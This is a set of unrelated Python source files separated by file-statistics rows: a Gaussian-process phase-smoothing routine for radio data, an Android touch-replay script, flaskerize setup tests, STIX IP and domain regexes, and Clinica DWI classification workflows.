y = (phase - y_mean)/y_scale
y = y.flatten()[:,None]
var = (error/y_scale*error_scale)**2
var = var.flatten()
t,d,f = coords
assert len(t) == Nt and len(d) == Nd and len(f) == Nf
t_scale = np.max(t) - np.min(t) + 1e-6
d_scale = np.std(d - np.mean(d,axis=0),axis=0).mean() + 1e-6
f_scale = np.max(f) - np.min(f) + 1e-6
t = (t - np.mean(t))/(t_scale)
d = (d - np.mean(d,axis=0))/(d_scale)
f = (f - np.mean(f))/(f_scale)
X = Smoothing._make_coord_array(t,d,f)
M = 100
Z = kmeans2(X, M, minit='points')[0]
with tf.Session(graph=tf.Graph()) as sess:
lock.acquire()
try:
with gp.defer_build():
k_space = gp.kernels.RBF(2,active_dims = [0,1],lengthscales=[kern_params[0]/d_scale])
k_space.lengthscales.set_trainable(False)
k_time = gp.kernels.RBF(1,active_dims = [2],lengthscales=[kern_params[1]/t_scale])
k_time.lengthscales.set_trainable(False)
k_freq = gp.kernels.RBF(1,active_dims = [3], lengthscales=[kern_params[2]/f_scale])
k_freq.lengthscales.set_trainable(False)
## just set k_space, rest to 1.0
k_space.variance = kern_params[3]
k_space.variance.set_trainable(False)
k_time.variance = 1.0
k_time.variance.set_trainable(False)
k_freq.variance = 1.0
k_freq.variance.set_trainable(False)
kern = k_space * k_time * k_freq
mean = gp.mean_functions.Zero()#Constant()
m = gp.models.svgp.SVGP(X, y, kern, mean_function = mean,
likelihood=Gaussian_v2(Y_var=var, trainable=False),
Z=Z, num_latent=1, minibatch_size=100, whiten=True)
m.feature.set_trainable(False)
m.kern.rbf_1.lengthscales.prior = gp.priors.Gaussian(1./d_scale,0.5/d_scale)
m.kern.rbf_2.lengthscales.prior = gp.priors.Gaussian(0,1./3.)
m.kern.rbf_3.lengthscales.set_trainable(False)
m.compile()
finally:
lock.release()
iterations=200
gp.train.AdamOptimizer(0.09).minimize(m, maxiter=iterations)
if verbose:
logging.warning(m)
for l,fs in enumerate(f):
if verbose:
logging.warning("Predicting freq {} MHz".format(coords[2][l]/1e6))
Xs = Smoothing._make_coord_array(t,d,np.array([fs]))
logging.warning("{}".format(Xs.shape))
ystar,varstar = m.predict_y(Xs)
logging.warning("{} {}".format(ystar.shape,varstar.shape))
ystar = ystar.reshape([Nt,Nd,1]) * y_scale + y_mean
varstar = varstar.reshape([Nt,Nd,1]) * y_scale**2
# set in the originial array (use locking)
lock.acquire()
try:
phase[...,l] = ystar
error[...,l] = np.sqrt(varstar)
finally:
lock.release()
return phase, error**2
except Exception as e:
print(e)
def apply_solutions(self, save_datapack, solution_params, ant_idx, time_idx, dir_idx, freq_idx, interval, shift, num_threads=1,verbose=False):
data = np.load(solution_params)
kern_ls = data['kern_ls']
kern_var = data['kern_var']
kern_times = data['time']
kern_antenna_labels = data['antenna']
datapack = self.datapack
directions, patch_names = datapack.get_directions(dir_idx)
times,timestamps = datapack.get_times(time_idx)
antennas,antenna_labels = datapack.get_antennas(ant_idx)
freqs = datapack.get_freqs(freq_idx)
if ant_idx is -1:
ant_idx = range(len(antennas))
if time_idx is -1:
time_idx = range(len(times))
if freq_idx is -1:
freq_idx = range(len(freqs))
if dir_idx is -1:
dir_idx = range(len(directions))
phase = datapack.get_phase(ant_idx,time_idx,dir_idx,freq_idx)
Na,Nt,Nd,Nf = phase.shape
logging.warning("Working on shapes {}".format(phase.shape))
assert interval <= Nt
variance = datapack.get_variance(ant_idx,time_idx,dir_idx,freq_idx)
error = np.sqrt(variance)
data_mask = variance < 0
error[data_mask] = 10.
logging.warning("Total masked phases: {}".format(np.sum(data_mask)))
uvw = UVW(location=datapack.radio_array.get_center(), obstime=times[0],
phase=datapack.get_center_direction())
dirs_uvw = directions.transform_to(uvw)
#already centered on zero
# d = np.array([np.arctan2(dirs_uvw.u.value, dirs_uvw.w.value),
# np.arctan2(dirs_uvw.v.value, dirs_uvw.w.value)]).T
d = np.array([directions.ra.deg, directions.dec.deg]).T
t = times.gps
f = freqs
directional_sampling = 1
time_sampling = 1
freq_sampling = 1
directional_slice = slice(0,Nd,directional_sampling)
freq_slice = slice(0,Nf,freq_sampling)
lock = Lock()
with futures.ThreadPoolExecutor(max_workers=num_threads) as executor:
jobs = []
mean_count = np.zeros(phase.shape)
for i,ai in enumerate(ant_idx):
for j,aj in enumerate(time_idx[::shift]):
start = j*shift
stop = min(start+interval,Nt)
time_slice = slice(start,stop,time_sampling)
###
# interpolate kern_params with this interval/shift
mean_time = np.mean(times.gps[time_slice])
# d, t, f, v
kern_params = [
np.interp(mean_time, kern_times, kern_ls[i,:,0]),
np.interp(mean_time, kern_times, kern_ls[i,:,1]),
np.interp(mean_time, kern_times, kern_ls[i,:,2]),
np.interp(mean_time, kern_times, kern_var[i,:,0])
]
mean_count[i,time_slice,directional_slice,freq_slice] += 1
# for l,al in enumerate(freq_idx):
# freq_slice = slice(l,l+1)
jobs.append(executor.submit(
Smoothing._apply_block_svgp,
phase[i,time_slice,directional_slice,freq_slice].copy(),
error[i,time_slice,directional_slice,freq_slice].copy(),
(t[time_slice],d[directional_slice],f[freq_slice]),
lock,
kern_params=kern_params,
pargs="Working on {} time chunk ({}) {} to ({}) {} at {} to {} MHz".format(antenna_labels[i],
start,timestamps[start],stop-1,timestamps[stop-1], freqs[0]/1e6, freqs[-1]/1e6),
verbose=verbose
)
)
results = futures.wait(jobs)
if verbose:
logging.warning(results)
results = [j.result() for j in jobs]
phase_mean = np.zeros(phase.shape)
variance_mean = np.zeros(variance.shape)
res_idx = 0
for i,ai in enumerate(ant_idx):
for j,aj in enumerate(time_idx[::shift]):
start = j*interval
stop = min((j+1)*interval,Nt)
time_slice = slice(start,stop,time_sampling)
res = results[res_idx]
phase_mean[i,time_slice,directional_slice,freq_slice] += res[0]
variance_mean[i,time_slice,directional_slice,freq_slice] += res[1]
res_idx += 1
phase_mean /= mean_count
variance_mean /= mean_count
datapack.set_phase(phase_mean, ant_idx=ant_idx,time_idx=time_idx,dir_idx=dir_idx,freq_idx=freq_idx)
datapack.set_variance(variance_mean, ant_idx=ant_idx,time_idx=time_idx,dir_idx=dir_idx,freq_idx=freq_idx)
datapack.save(save_datapack)
if __name__=='__main__':
import os
if len(sys.argv) == 2:
starting_datapack = sys.argv[1]
else:
starting_datapack = "../data/rvw_datapack_full_phase_dec27.hdf5"
smoothing = Smoothing(starting_datapack)
#smoothing.solve_time_intervals("gp_params.npz",range(1,62),-1,-1,range(0,20),32,32,num_threads=16,verbose=True)
# refined_params = smoothing.refine_statistics_timeonly('gp_params.npz')
# print(refined_params.shape)
# smoothing.solve_time_intervals("gp_params_fixed_scales.npz",range(1,62),-1,-1,range(0,20),32,32,num_threads=16,verbose=True,refined_params=refined_params)
# plt.ion()
# smoothing.refine_statistics_timeonly('gp_params.npz')
# smoothing.refine_statistics('gp_params.npz')
# smoothing.refine_statistics_timeonly('gp_params_fixed_scales.npz')
# smoothing.refine_statistics('gp_params_fixed_scales.npz')
# plt.ioff()
smoothing.apply_solutions(starting_datapack.replace('.hdf5','_refined_smoothed.hdf5'),
"gp_params_fixed_scales.npz",range(1,62), -1, -1, range(0,20), 32, 32, num_threads=1,verbose=True)
| 44.457561
| 160
| 0.533104
| 6,030
| 45,569
| 3.8733
| 0.066998
| 0.020551
| 0.01079
| 0.017983
| 0.817948
| 0.800437
| 0.77479
| 0.760233
| 0.74833
| 0.727308
| 0
| 0.028534
| 0.330137
| 45,569
| 1,024
| 161
| 44.500977
| 0.736609
| 0.06737
| 0
| 0.758788
| 0
| 0
| 0.033968
| 0.004701
| 0
| 0
| 0
| 0
| 0.004848
| 1
| 0.013333
| false
| 0
| 0.031515
| 0
| 0.055758
| 0.010909
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0bbf82e4c0c6da55dff7e713740feb7448baf165
| 1,487
|
py
|
Python
|
utility/refined_events/chrome_record.py
|
EfficientAI/efficient_cv
|
e308f229e4d99da86ad56f87f3a78b2c81f27ca5
|
[
"MIT"
] | null | null | null |
utility/refined_events/chrome_record.py
|
EfficientAI/efficient_cv
|
e308f229e4d99da86ad56f87f3a78b2c81f27ca5
|
[
"MIT"
] | null | null | null |
utility/refined_events/chrome_record.py
|
EfficientAI/efficient_cv
|
e308f229e4d99da86ad56f87f3a78b2c81f27ca5
|
[
"MIT"
] | null | null | null |
from com.android.monkeyrunner import MonkeyRunner
from com.android.monkeyrunner import MonkeyDevice
print('Connecting to device...')
device = MonkeyRunner.waitForConnection()
print('Connected to device')
# Reproduce action log from here
print('Start to reproduce action log')
device.touch(536, 1704, MonkeyDevice.DOWN_AND_UP)
print('Executing : device.touch(536, 1704, MonkeyDevice.DOWN_AND_UP)')
MonkeyRunner.sleep(1.0)
device.touch(536, 1268, MonkeyDevice.DOWN_AND_UP)
print('Executing : device.touch(536, 1268, MonkeyDevice.DOWN_AND_UP)')
MonkeyRunner.sleep(1.0)
device.touch(904, 140, MonkeyDevice.DOWN_AND_UP)
print('Executing : device.touch(904, 140, MonkeyDevice.DOWN_AND_UP)')
MonkeyRunner.sleep(1.0)
device.touch(74, 128, MonkeyDevice.DOWN_AND_UP)
print('Executing : device.touch(74, 128, MonkeyDevice.DOWN_AND_UP)')
MonkeyRunner.sleep(1.0)
device.touch(901, 132, MonkeyDevice.DOWN_AND_UP)
print('Executing : device.touch(901, 132, MonkeyDevice.DOWN_AND_UP)')
MonkeyRunner.sleep(1.0)
device.touch(982, 1112, MonkeyDevice.DOWN_AND_UP)
print('Executing : device.touch(982, 1112, MonkeyDevice.DOWN_AND_UP)')
MonkeyRunner.sleep(1.0)
device.touch(500, 1000, MonkeyDevice.DOWN_AND_UP)
print('Executing : device.touch(982, 1112, MonkeyDevice.DOWN_AND_UP)')
MonkeyRunner.sleep(1.0)
device.press("KEYCODE_HOME", MonkeyDevice.DOWN_AND_UP)
print('Executing : device.press("KEYCODE_HOME", MonkeyDevice.DOWN_AND_UP)')
MonkeyRunner.sleep(1.0)
print('Finish to reproduce action log')
| 35.404762
| 75
| 0.791527
| 216
| 1,487
| 5.291667
| 0.194444
| 0.223972
| 0.265967
| 0.293963
| 0.826772
| 0.770779
| 0.770779
| 0.75853
| 0.486439
| 0.4007
| 0
| 0.077091
| 0.075319
| 1,487
| 42
| 76
| 35.404762
| 0.754182
| 0.020175
| 0
| 0.322581
| 0
| 0
| 0.413462
| 0.156593
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.064516
| 0
| 0.064516
| 0.387097
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f053441ed8995ad8a6e6d04676e1d494cae15c0a
| 381
|
py
|
Python
|
cloudframe/resource/v1/res01.py
|
cloudken/faas-worker
|
a8f09f47f7b6eea99f848a7d1783fef2fd29161e
|
[
"Apache-2.0"
] | null | null | null |
cloudframe/resource/v1/res01.py
|
cloudken/faas-worker
|
a8f09f47f7b6eea99f848a7d1783fef2fd29161e
|
[
"Apache-2.0"
] | null | null | null |
cloudframe/resource/v1/res01.py
|
cloudken/faas-worker
|
a8f09f47f7b6eea99f848a7d1783fef2fd29161e
|
[
"Apache-2.0"
] | null | null | null |
from six.moves import http_client
def post(tenant, req):
ack = {'status': 'OK'}
return http_client.OK, ack
def put(tenant, res_id, req):
ack = {'status': 'OK'}
return http_client.OK, ack
def get(tenant, res_id):
ack = {'status': 'OK'}
return http_client.OK, ack
def delete(tenant, res_id):
ack = {'status': 'OK'}
return http_client.OK, ack
| 16.565217
| 33
| 0.622047
| 58
| 381
| 3.948276
| 0.327586
| 0.218341
| 0.19214
| 0.296943
| 0.720524
| 0.720524
| 0.720524
| 0.720524
| 0.720524
| 0.707424
| 0
| 0
| 0.225722
| 381
| 22
| 34
| 17.318182
| 0.776271
| 0
| 0
| 0.615385
| 0
| 0
| 0.084211
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.307692
| false
| 0
| 0.076923
| 0
| 0.692308
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 10
|
f06f2a805d6ae670d99aa40f21133b6206b60843
| 1,800
|
py
|
Python
|
flaskerize/schematics/setup/schematic_test.py
|
ehoeffner/flaskerize
|
cb887a80ae0a2c06f61cf941e029fd7174fdd233
|
[
"BSD-3-Clause"
] | 119
|
2019-05-07T00:48:58.000Z
|
2022-03-30T07:17:53.000Z
|
flaskerize/schematics/setup/schematic_test.py
|
ehoeffner/flaskerize
|
cb887a80ae0a2c06f61cf941e029fd7174fdd233
|
[
"BSD-3-Clause"
] | 36
|
2019-04-28T11:14:56.000Z
|
2022-03-28T16:09:21.000Z
|
flaskerize/schematics/setup/schematic_test.py
|
ehoeffner/flaskerize
|
cb887a80ae0a2c06f61cf941e029fd7174fdd233
|
[
"BSD-3-Clause"
] | 15
|
2019-08-29T17:38:28.000Z
|
2021-04-29T02:27:59.000Z
|
import os
def test_schematic(tmp_path):
expected = """#!/usr/bin/env python
from setuptools import setup, find_packages
setup(
name="test",
version="0.1.0",
description="Project built by Flaskerize",
author="AJ Pryor",
author_email="apryor6@gmail.com",
url="https://github.com/apryor6/flaskerize",
packages=find_packages(),
install_requires=['thingy>0.3.0', 'widget>=2.4.3', 'doodad>4.1.0'],
)"""
from_dir = str(tmp_path)
name = "test"
COMMAND = f"""fz generate setup {name} --from-dir {from_dir} --install-requires 'thingy>0.3.0' 'widget>=2.4.3' 'doodad>4.1.0' --author 'AJ Pryor' --author-email 'apryor6@gmail.com'"""
os.system(COMMAND)
outfile = os.path.join(tmp_path, "setup.py")
assert os.path.isfile(outfile)
with open(outfile, "r") as fid:
content = fid.read()
assert content == expected
def test_schematic_from_Flaskerize(tmp_path):
from flaskerize.parser import Flaskerize
expected = """#!/usr/bin/env python
from setuptools import setup, find_packages
setup(
name="test",
version="0.1.0",
description="Project built by Flaskerize",
author="AJ",
author_email="apryor6@gmail.com",
url="https://github.com/apryor6/flaskerize",
packages=find_packages(),
install_requires=['thingy>0.3.0', 'widget>=2.4.3', 'doodad>4.1.0'],
)"""
from_dir = str(tmp_path)
name = "test"
COMMAND = f"""fz generate setup {name} --from-dir {from_dir} --install-requires thingy>0.3.0 widget>=2.4.3 doodad>4.1.0 --author AJ --author-email apryor6@gmail.com"""
result = Flaskerize(COMMAND.split())
outfile = os.path.join(tmp_path, "setup.py")
assert os.path.isfile(outfile)
with open(outfile, "r") as fid:
content = fid.read()
assert content == expected
| 31.034483
| 187
| 0.657222
| 260
| 1,800
| 4.465385
| 0.253846
| 0.036176
| 0.062016
| 0.079242
| 0.873385
| 0.873385
| 0.873385
| 0.850991
| 0.819983
| 0.819983
| 0
| 0.032236
| 0.172778
| 1,800
| 57
| 188
| 31.578947
| 0.747482
| 0
| 0
| 0.782609
| 0
| 0.086957
| 0.601111
| 0.101111
| 0
| 0
| 0
| 0
| 0.086957
| 1
| 0.043478
| false
| 0
| 0.086957
| 0
| 0.130435
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b2bcd863b8479423dc873d1bd9479ebf497aa268
| 2,446
|
py
|
Python
|
stix_shifter_utils/stix_translation/src/json_to_stix/observable.py
|
lizstranger/stix-shifter
|
d1d979085e85853e11d206d87c9e75fe975ab61d
|
[
"Apache-2.0"
] | 1
|
2020-08-31T21:41:45.000Z
|
2020-08-31T21:41:45.000Z
|
stix_shifter_utils/stix_translation/src/json_to_stix/observable.py
|
lizstranger/stix-shifter
|
d1d979085e85853e11d206d87c9e75fe975ab61d
|
[
"Apache-2.0"
] | null | null | null |
stix_shifter_utils/stix_translation/src/json_to_stix/observable.py
|
lizstranger/stix-shifter
|
d1d979085e85853e11d206d87c9e75fe975ab61d
|
[
"Apache-2.0"
] | null | null | null |
REGEX = {
'date': '\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}(.\d+)?Z',
'ipv4': ('^((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$'), # noqa: E501
'ipv6': ('^(([0-9a-fA-F]{1,4}:){7,7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(ffff(:0{1,4}){0,1}:){0,1}((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))$'),
'mac': ('^(([0-9a-fA-F]{2}[:-]){5}([0-9a-fA-F]{2})|([0-9a-fA-F]{3}[\.]){3}([0-9a-fA-F]{3}))$'),
'ipv4_cidr': ('^((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\/(([1-2][0-9])|(3[0-2])|[0-9])$'), # noqa: E501
'domain_name': ('^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z0-9][a-z0-9-]{0,61}[a-z0-9]$'),
'ipv6_cidr': ('^(([0-9a-fA-F]{1,4}:){7,7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:' '[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|' '([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|' '[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]{0,4}){0,4}%' '[0-9a-zA-Z]{1,}|::(ffff(:0{1,4}){0,1}:){0,1}((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}' '[0-9]){0,1}[0-9])|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))\/((1[0-2][0-8])|([1-9][0-9])|[0-9])$')
}
properties = {
'first_observed': {
'valid_regex': REGEX['date']
},
'last_observed': {
'valid_regex': REGEX['date']
},
'ipv4-addr.value': {
'valid_regex': REGEX['ipv4']
},
'ipv6-addr.value': {
'valid_regex': REGEX['ipv6']
},
'created': {
'valid_regex': REGEX['date']
},
'modified': {
'valid_regex': REGEX['date']
},
'domain-name.value': {
'valid_regex': REGEX['domain_name']
}
}
| 71.941176
| 733
| 0.404742
| 625
| 2,446
| 1.5632
| 0.0688
| 0.128966
| 0.204708
| 0.24565
| 0.776868
| 0.634596
| 0.634596
| 0.634596
| 0.634596
| 0.634596
| 0
| 0.222819
| 0.086263
| 2,446
| 33
| 734
| 74.121212
| 0.214318
| 0.008585
| 0
| 0.125
| 0
| 0.375
| 0.828241
| 0.727085
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b2e030852aba8bd3b7584c8e373daf62ec2fb89e
| 79,633
|
py
|
Python
|
Paper_Specific_Versions/2018_OHBM_DTI/Code/clinica_ml_dwi/mlworkflow_dwi_utils.py
|
adamwild/AD-ML
|
e4ac0b7d312ab482b9b52bb3f5c6745cc06431e9
|
[
"MIT"
] | null | null | null |
Paper_Specific_Versions/2018_OHBM_DTI/Code/clinica_ml_dwi/mlworkflow_dwi_utils.py
|
adamwild/AD-ML
|
e4ac0b7d312ab482b9b52bb3f5c6745cc06431e9
|
[
"MIT"
] | null | null | null |
Paper_Specific_Versions/2018_OHBM_DTI/Code/clinica_ml_dwi/mlworkflow_dwi_utils.py
|
adamwild/AD-ML
|
e4ac0b7d312ab482b9b52bb3f5c6745cc06431e9
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
__author__ = ["Junhao Wen", "Jorge Samper-Gonzalez"]
__copyright__ = "Copyright 2016-2018 The Aramis Lab Team"
__credits__ = ["Junhao Wen"]
__license__ = "See LICENSE.txt file"
__version__ = "0.1.0"
__status__ = "Development"
import os
import errno
from os import path
from pandas.io import parsers
from mlworkflow_dwi import DWI_VB_RepHoldOut_DualSVM, DWI_RB_RepHoldOut_DualSVM
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from clinica.pipelines.machine_learning.ml_workflows import RB_RepHoldOut_DualSVM, VB_RepHoldOut_DualSVM
from os import path
from scipy import stats
def run_voxel_based_classification(caps_directory, diagnoses_tsv, subjects_visits_tsv, output_dir, task, n_threads, n_iterations, test_size, grid_search_folds,
balanced_down_sample=False, modality='dwi', dwi_maps=['fa', 'md'], fwhm=[8],
tissue_type = ['WM', 'GM', 'GM_WM'], threshold=[0.3], group_id='ADNIbl'):
"""
This is a function to run the Voxel-based calssification tasks_imbalanced after the imaging processing pipeline of ADNI
:param caps_directory: caps directory for Clinica outputs
:param diagnoses_tsv:
:param subjects_visits_tsv:
:param output_dir: the path to store the classification outputs
:param tissue_type: one of these:
:param threshold: the threshold to masking the features
:param fwhm: the threshold to smooth the mask of tissues
:param dwi_maps: the maps based on DWI, currently, we just have maps from DTI model.
:param balanced_down_sample: int, how many times to repeat for the downsampling procedures to creat the balanced data, default is 0, which means we do not force the data to be balanced
:param task: the name of the task to store the classification results
:param n_threads: number of cores to use for this classification
:param n_iterations: number of runs for the RepHoldOut
:param test_size: propotion for the testing dataset
:param grid_search_folds: number of runs to search the hyperparameters
:return:
"""
splits_indices, splits_indices_pickle = split_subjects_to_pickle(diagnoses_tsv, n_iterations=n_iterations,
test_size=test_size, balanced=balanced_down_sample)
if modality == 'dwi':
# ## run the classification
if balanced_down_sample: ###
print "Using balanced data to do classifications!!!"
for dwi_map in dwi_maps:
for i in tissue_type:
for j in threshold:
for k in fwhm:
classification_dir = path.join(output_dir, 'RandomBalanced',
task + '_' + i + '_' + str(j) + '_' + str(k),
dwi_map)
if not path.exists(classification_dir):
os.makedirs(classification_dir)
print "\nRunning %s" % classification_dir
wf = DWI_VB_RepHoldOut_DualSVM(caps_directory, subjects_visits_tsv, diagnoses_tsv, dwi_map,
i, j, classification_dir, fwhm=k,
n_threads=n_threads, n_iterations=n_iterations, test_size=test_size,
grid_search_folds=grid_search_folds, splits_indices=splits_indices)
wf.run()
else:
print "This combination has been classified, just skip: %s " % classification_dir
else: ## original classifcation
print "Using raw data to do classifications!!!"
for dwi_map in dwi_maps:
for i in tissue_type:
for j in threshold:
for k in fwhm:
classification_dir = path.join(output_dir,
task + '_' + i + '_' + str(j) + '_' + str(k),
dwi_map)
if not path.exists(classification_dir):
os.makedirs(classification_dir)
print "\nRunning %s" % classification_dir
wf = DWI_VB_RepHoldOut_DualSVM(caps_directory, subjects_visits_tsv, diagnoses_tsv, dwi_map,
i, j, classification_dir, fwhm=k,
n_threads=n_threads, n_iterations=n_iterations,
test_size=test_size,
grid_search_folds=grid_search_folds, splits_indices=splits_indices)
wf.run()
else:
print "This combination has been classified, just skip: %s " % classification_dir
elif modality == 'T1': ## Run T1 classification
if balanced_down_sample: ###
print "Using balanced data to do classifications!!!"
for k in fwhm:
classification_dir = path.join(output_dir, 'RandomBalanced',
task + '_fwhm_' + str(k))
if not path.exists(classification_dir):
os.makedirs(classification_dir)
print "\nRunning %s" % classification_dir
wf = VB_RepHoldOut_DualSVM(caps_directory, subjects_visits_tsv, diagnoses_tsv, group_id, modality,
classification_dir, fwhm=k, n_threads=n_threads, n_iterations=n_iterations,
test_size=test_size, splits_indices=splits_indices)
wf.run()
else:
print "This combination has been classified, just skip: %s " % classification_dir
else: ## original classifcation
print "Using raw data to do classifications!!!"
#### have the same lists for all the iterations
for k in fwhm:
classification_dir = path.join(output_dir,
task + '_fwhm_' + str(k))
if not path.exists(classification_dir):
os.makedirs(classification_dir)
print "\nRunning %s" % classification_dir
wf = VB_RepHoldOut_DualSVM(caps_directory, subjects_visits_tsv, diagnoses_tsv, group_id, modality,
classification_dir, fwhm=k, n_threads=n_threads,
n_iterations=n_iterations,
test_size=test_size, splits_indices=splits_indices)
wf.run()
else:
print "This combination has been classified, just skip: %s " % classification_dir
else:
pass
def run_roi_based_classification(caps_directory, diagnoses_tsv, subjects_visits_tsv, output_dir, atlas,
task, n_threads, n_iterations, test_size, grid_search_folds, balanced_down_sample=False,
dwi_maps=['fa', 'md'], modality='dwi', group_id='ADNIbl'):
"""
This is a function to run the Voxel-based calssification tasks_imbalanced after the imaging processing pipeline of ADNI
:param caps_directory: caps directory for Clinica outputs
:param diagnoses_tsv:
:param subjects_visits_tsv:
:param output_dir: the path to store the classification outputs
:param atlas: one of these: ['JHUDTI81', 'JHUTracts0', 'JHUTracts25']
:param dwi_maps: the maps based on DWI, currently, we just have maps from DTI model.
:param balanced_down_sample: int, how many times to repeat for the downsampling procedures to creat the balanced data, default is 0, which means we do not force the data to be balanced
:param task: the name of the task to store the classification results
:param n_threads: number of cores to use for this classification
:param n_iterations: number of runs for the RepHoldOut
:param test_size: propotion for the testing dataset
:param grid_search_folds: number of runs to search the hyperparameters
:return:
"""
splits_indices, splits_indices_pickle = split_subjects_to_pickle(diagnoses_tsv, n_iterations=n_iterations,
test_size=test_size, balanced=balanced_down_sample)
if modality == 'dwi':
## run the classification
if balanced_down_sample: ###
print "Using balanced data to do classifications!!!"
for dwi_map in dwi_maps:
for i in atlas:
classification_dir = path.join(output_dir, 'RandomBalanced',
task + '_' + i,
dwi_map)
if not path.exists(classification_dir):
os.makedirs(classification_dir)
print "\nRunning %s" % classification_dir
wf = DWI_RB_RepHoldOut_DualSVM(caps_directory, subjects_visits_tsv, diagnoses_tsv, i, dwi_map,
classification_dir,
n_threads=n_threads, n_iterations=n_iterations,
test_size=test_size,
grid_search_folds=grid_search_folds,
splits_indices=splits_indices)
wf.run()
else:
print "This combination has been classified, just skip: %s " % classification_dir
else:
print "Using raw data to do classifications!!!"
for dwi_map in dwi_maps:
for i in atlas:
classification_dir = path.join(output_dir,
task + '_' + i,
dwi_map)
if not path.exists(classification_dir):
os.makedirs(classification_dir)
print "\nRunning %s" % classification_dir
wf = DWI_RB_RepHoldOut_DualSVM(caps_directory, subjects_visits_tsv, diagnoses_tsv, i,
dwi_map,
classification_dir,
n_threads=n_threads, n_iterations=n_iterations,
test_size=test_size,
grid_search_folds=grid_search_folds, splits_indices=splits_indices)
wf.run()
else:
print "This combination has been classified, just skip: %s " % classification_dir
elif modality == 'T1':
## run the classification
if balanced_down_sample: ###
print "Using balanced data to do classifications!!!"
for i in atlas:
classification_dir = path.join(output_dir, 'RandomBalanced',
task + '_' + i)
if not path.exists(classification_dir):
os.makedirs(classification_dir)
print "\nRunning %s" % classification_dir
wf = RB_RepHoldOut_DualSVM(caps_directory, subjects_visits_tsv, diagnoses_tsv, group_id, modality, i,
classification_dir, n_threads=n_threads, n_iterations=n_iterations, test_size=test_size,
splits_indices=splits_indices)
wf.run()
else:
print "This combination has been classified, just skip: %s " % classification_dir
else:
print "Using raw data to do classifications!!!"
for i in atlas:
classification_dir = path.join(output_dir,
task + '_' + i)
if not path.exists(classification_dir):
os.makedirs(classification_dir)
print "\nRunning %s" % classification_dir
wf = RB_RepHoldOut_DualSVM(caps_directory, subjects_visits_tsv, diagnoses_tsv, group_id,
modality, i,
classification_dir, n_threads=n_threads, n_iterations=n_iterations,
test_size=test_size, splits_indices=splits_indices)
wf.run()
else:
